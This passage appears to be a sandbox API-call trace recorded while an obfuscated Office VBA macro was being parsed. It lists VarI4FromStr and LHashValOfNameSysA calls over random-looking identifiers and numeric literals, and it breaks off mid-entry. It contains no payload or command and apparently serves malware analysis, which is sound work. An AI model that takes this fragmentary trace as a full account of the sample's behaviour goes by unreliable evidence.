[0067.842] VarI4FromStr (in: strIn="543648728", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.842] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="s1AA_QA") returned 0x10275b [0067.842] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.842] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OAAADk") returned 0x10949f [0067.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.842] VarI4FromStr (in: strIn="316426375", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.842] VarI4FromStr (in: strIn="43418535", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.842] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.842] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wACQAD") returned 0x1013b0 [0067.842] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.842] VarI4FromStr (in: strIn="863336269", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.842] VarI4FromStr (in: strIn="59644700", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.842] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.842] VarI4FromStr (in: strIn="519829056", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.842] VarI4FromStr (in: strIn="19425505", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.842] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.842] VarI4FromStr (in: strIn="732428", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.842] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vAQDAQk") returned 0x10193c [0067.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.842] VarI4FromStr (in: strIn="233387920", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.842] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="IAA4AB") returned 0x10c69d [0067.843] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.843] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.843] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.843] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="D_UAZBAA") returned 0x10da76 [0067.843] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RAcAAAAZ") returned 0x109e7c [0067.843] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.843] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="qZAQD_D") returned 0x1016a5 [0067.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.843] VarI4FromStr (in: strIn="791755301", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.843] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="i1_UZGA") returned 0x1027f0 [0067.843] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sAAAAQ") returned 0x10ef0e [0067.843] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MXoAUA") returned 0x1054f7 [0067.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.843] VarI4FromStr (in: strIn="429406877", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.843] VarI4FromStr (in: strIn="939924528", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.843] VarI4FromStr (in: strIn="586579239", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.843] VarI4FromStr (in: strIn="191616759", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.843] VarI4FromStr (in: strIn="621574233", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.843] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ZUUCkx") returned 0x107197 [0067.843] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.843] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wDxcZD") returned 0x10b988 [0067.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.843] VarI4FromStr (in: strIn="629525487", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.843] VarI4FromStr (in: strIn="912535287", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.843] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.843] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="woAB4w") returned 0x10312c [0067.843] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.843] VarI4FromStr (in: strIn="672434623", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.843] VarI4FromStr (in: strIn="261962359", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.844] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.844] VarI4FromStr (in: strIn="569003086", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.844] VarI4FromStr (in: strIn="26051242", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.844] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.844] VarI4FromStr (in: strIn="758498138", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.844] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OUCDAwB") returned 0x102e73 [0067.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.844] VarI4FromStr (in: strIn="939866729", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.844] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="m1koQo") returned 0x104e07 [0067.844] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.844] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.844] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lZ1DA_AU") returned 0x107ab2 [0067.844] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.844] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NXADUQQ") returned 0x1080f4 [0067.844] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="X_ZAXZ") returned 0x10caf8 [0067.844] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.844] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="W4xQCX") returned 0x10e28e [0067.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.844] VarI4FromStr (in: strIn="483522681", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.844] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iGAGAo1D") returned 0x10ad17 [0067.844] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="oAAwwD") returned 0x100740 [0067.844] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RAQAAA1") returned 0x10d676 [0067.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.844] VarI4FromStr (in: strIn="228162684", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.845] VarI4FromStr (in: strIn="270229670", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.845] VarI4FromStr (in: strIn="653159218", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.845] VarI4FromStr (in: strIn="718112831", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.845] VarI4FromStr (in: strIn="291815826", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.845] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jZkBkB") returned 0x1021e1 [0067.845] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.845] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KQAD_cc") returned 0x104e6d [0067.845] VarI4FromStr (in: strIn="369731432", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.845] VarI4FromStr (in: strIn="797471621", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.845] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.845] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="dACDBZBD") returned 0x10b555 [0067.845] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.845] VarI4FromStr (in: strIn="679111687", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.845] VarI4FromStr (in: strIn="594860392", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.845] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.845] VarI4FromStr (in: strIn="654387485", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.845] VarI4FromStr (in: strIn="648134071", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.845] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.845] VarI4FromStr (in: strIn="977910210", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.845] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ZADDcUA") returned 0x10baca [0067.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.845] VarI4FromStr (in: strIn="730352481", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.845] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="uAo1wABA") returned 0x10c961 [0067.845] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.845] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.845] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.845] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wUA41Aok") returned 0x108e27 [0067.845] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mQ1BQQ") returned 0x103230 [0067.846] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.846] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="V1D1UUA") returned 0x1004f3 [0067.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.846] VarI4FromStr (in: strIn="9038145", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.846] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="O1ADwAGU") returned 0x107fc1 [0067.846] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="bDQDQU") returned 0x10901b [0067.846] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ixAxAX") returned 0x10a2f0 [0067.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.846] VarI4FromStr (in: strIn="4460580", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.846] VarI4FromStr (in: strIn="84464252", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.846] VarI4FromStr (in: strIn="396386763", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.846] VarI4FromStr (in: strIn="670241352", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.846] VarI4FromStr (in: strIn="993804692", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.846] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PQkBkAD") returned 0x10420f [0067.846] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.846] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="uADXAAA") returned 0x10e7b4 [0067.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.846] VarI4FromStr (in: strIn="247962913", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.846] VarI4FromStr (in: strIn="515158138", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.846] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.846] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="qAD1wZ") returned 0x10c03d [0067.846] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.846] VarI4FromStr (in: strIn="863691931", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.846] VarI4FromStr (in: strIn="374283948", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.846] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.846] VarI4FromStr (in: strIn="146274648", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.846] VarI4FromStr (in: strIn="526413413", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.846] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.846] VarI4FromStr (in: strIn="15621494", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.847] CExposedStream::Read () returned 0x0 [0067.847] CExposedStream::Read () returned 0x0 [0067.847] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ZwBUAGA") returned 0x1077a0 [0067.847] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.847] VarI4FromStr (in: strIn="879317200", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.848] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GAAA1C") returned 0x10dc67 [0067.848] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.848] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.848] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="kQBC_B") returned 0x102c8e [0067.848] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.848] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="qBD_xAwA") returned 0x10dacf [0067.848] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="nDAUUDQG") returned 0x101f4e [0067.848] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.848] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ucAQwB_X") returned 0x1051e1 [0067.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.848] VarI4FromStr (in: strIn="808293424", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.848] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="V4wC11xA") returned 0x1091ef [0067.848] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vXCAQ_A") returned 0x102ecd [0067.848] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UAAXoBC") returned 0x107cd1 [0067.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.848] VarI4FromStr (in: strIn="583514313", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.848] VarI4FromStr (in: strIn="221575124", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.848] VarI4FromStr (in: strIn="451609877", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.848] VarI4FromStr (in: strIn="577036991", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.848] VarI4FromStr (in: strIn="32570759", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.848] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vDQB_D") returned 0x104d18 [0067.848] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.848] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WADcQGZ") returned 0x103edb [0067.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.848] VarI4FromStr (in: strIn="449540367", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.848] VarI4FromStr (in: strIn="77098707", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.848] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.848] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="QCDDAD") returned 0x104655 [0067.848] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.848] VarI4FromStr (in: strIn="94758245", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.849] VarI4FromStr (in: strIn="366568727", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.849] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.849] VarI4FromStr (in: strIn="712004000", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.849] VarI4FromStr (in: strIn="809483655", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.849] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.849] VarI4FromStr (in: strIn="805156595", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.849] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iDAAxoU") returned 0x1042d3 [0067.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.849] VarI4FromStr (in: strIn="996810524", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.849] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="TUAoAADQ") returned 0x104991 [0067.849] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.849] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.849] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.849] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AkkxUQA4") returned 0x10b8a3 [0067.849] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KAABQAG") returned 0x101c6d [0067.849] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.849] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OBAoc1G") returned 0x10df79 [0067.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.849] VarI4FromStr (in: strIn="885651673", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.849] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="JUwxAAA") returned 0x103a2b [0067.849] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="woxGDZQ4") returned 0x101f3b [0067.849] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cXQ4GA") returned 0x10b60a [0067.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.849] VarI4FromStr (in: strIn="965098632", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.849] VarI4FromStr (in: strIn="197198681", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.850] VarI4FromStr (in: strIn="226467993", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.850] VarI4FromStr (in: strIn="133212484", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.850] VarI4FromStr (in: strIn="721971016", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.850] VarI4FromStr (in: strIn="365630247", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.850] VarI4FromStr (in: strIn="419929057", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.850] VarI4FromStr (in: strIn="688900347", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.850] VarI4FromStr (in: strIn="773933263", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.850] VarI4FromStr (in: strIn="550233479", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.850] VarI4FromStr (in: strIn="592583261", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.850] VarI4FromStr (in: strIn="984427235", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.850] VarI4FromStr (in: strIn="191405857", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.850] VarI4FromStr (in: strIn="529080851", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.850] VarI4FromStr (in: strIn="828916451", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.850] VarI4FromStr (in: strIn="807687984", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.850] VarI4FromStr (in: strIn="55680763", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.850] VarI4FromStr (in: strIn="189325516", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.850] VarI4FromStr (in: strIn="415346396", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.850] VarI4FromStr (in: strIn="803650550", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: 